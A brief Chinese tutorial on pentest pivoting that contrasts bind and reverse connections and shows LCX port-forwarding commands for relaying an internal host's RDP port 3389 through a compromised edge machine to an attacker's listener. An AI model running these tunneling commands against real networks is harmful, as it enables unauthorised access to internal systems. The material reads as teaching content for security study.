正向连接
正向是攻击者主动连接目标机器
条件:边界机能够支持外网连接且存在外网IP
例子:一般拿下边界机,如web机器,且防火墙可以通过
反向连接
反向是目标机器主动连接攻击机,由攻击机开启监听
条件:攻击者监听的设备必须具备有外网访问地址
例子:通过钓鱼进入内网,多数机器是内网IP,但能够上外网,只能用反向连接
端口转发
端口转发(Port forwarding):有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法,端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为。
端口转发工具——LCX
• lcx是最为经典的端口转发工具,基于Socket套接字实现端口转发
• 有Windows和Linux两个版本,分别为lcx.exe 和 portmap
LCX——端口转发(正向连接)
将内网靶机的3389端口转发到边界机的8888端口
命令:lcx.exe -tran 8888 靶机ip 3389
场景:由于防火墙限制,只允许8888入站
反向连接
将内网靶机的3389端口转发到攻击机的8888端口
攻击机进行监听:lcx.exe -listen 7777 8888
边界机:lcx.exe -slave 攻击机ip 8888 靶机ip 3389